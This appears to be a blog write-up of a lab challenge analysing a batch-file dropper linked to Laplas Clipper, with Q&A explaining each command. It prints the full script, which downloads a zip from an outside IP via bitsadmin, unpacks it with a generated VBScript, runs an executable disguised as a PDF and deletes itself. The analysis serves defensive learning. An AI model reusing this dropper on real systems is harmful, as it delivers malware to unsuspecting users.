A malicious batch file has been discovered that downloads and executes files associated with the Laplas Clipper malware. Analyze this batch file to understand its behavior and help us investigate its activities.
First, let’s transfer the challenge file to our sandbox environment and verify that it is indeed a batch file.
Next, we can examine the batch file’s source code and address the following questions.
@echo off
bitsadmin /transfer System /Download /Priority FOREGROUND http://193.169.255.78/FW-APGKSDTPX4HOAUJJMBVDNXPOHZ.PDF.zip %TEMP%\FW-APGKSDTPX4HOAUJJMBVDNXPOHZ.PDF.zip
setlocal
cd /d %~dp0
Call :UnZipFile "%TEMP%" "%TEMP%\FW-APGKSDTPX4HOAUJJMBVDNXPOHZ.PDF.zip"
cd /d "%TEMP%"
start "" "FW-APGKSDTPX4HOAUJJMBVDNXPOHZ.PDF.exe"
del %~s0 /q
:UnZipFile <ExtractTo> <newzipfile>
set vbs="%TEMP%\_.vbs"
if exist %vbs% del /f /q %vbs%
>%vbs% echo Set fso = CreateObject("Scripting.FileSystemObject")
>>%vbs% echo If NOT fso.FolderExists(%1) Then
>>%vbs% echo fso.CreateFolder(%1)
>>%vbs% echo End If
>>%vbs% echo set objShell = CreateObject("Shell.Application")
>>%vbs% echo set FilesInZip=objShell.NameSpace(%2).items
>>%vbs% echo objShell.NameSpace(%1).CopyHere(FilesInZip)
>>%vbs% echo Set fso = Nothing
>>%vbs% echo Set objShell = Nothing
cscript //nologo %vbs%
if exist %vbs% del /f /q %vbs%
What command is used to prevent the command echoing in the console?
@echo off is a batch command that hides the display of commands in the terminal, keeping the script output clean. Hackers often use this to conceal malicious actions, such as downloading malware or modifying system settings, making the script harder to analyze and detect.
Which tool is used to download a file from a specified URL in the script?
bitsadmin manages background file transfers in Windows. Hackers exploit it to stealthily download or execute malicious files, posing a security risk.
What is the priority set for the download operation in the script?
/Priority FOREGROUND sets a BITS transfer job to run with high priority, using more immediate system resources, which can speed up the transfer but may impact other processes.
Which command is used to start localization of environment changes in the script?
setlocal in batch scripting creates a local scope for variables, meaning changes to variables within the block won’t affect the global environment once the block ends.
Which IP address is used by malicious code?
The IP address can be found in the bitsadmin command responsible for downloading the malicious ZIP file disguised as a PDF.
What is the name of the subroutine called to extract the contents of the zip file?
The batch file calls a batch subroutine (UnZipFile) to unzip the file located at %TEMP%\FW-APGKSDTPX4HOAUJJMBVDNXPOHZ.PDF.zip into the %TEMP% directory.
Which command attempts to start an executable file extracted from the zip file?
This command starts the executable file FW-APGKSDTPX4HOAUJJMBVDNXPOHZ.PDF.exe without a command window title (empty string "").
Which scripting language is used to extract the contents of the zip file?
The code uses Batch scripting to create and manage a temporary VBS (VBScript) file, which is written in VBScript.
Persecure : my learning archive 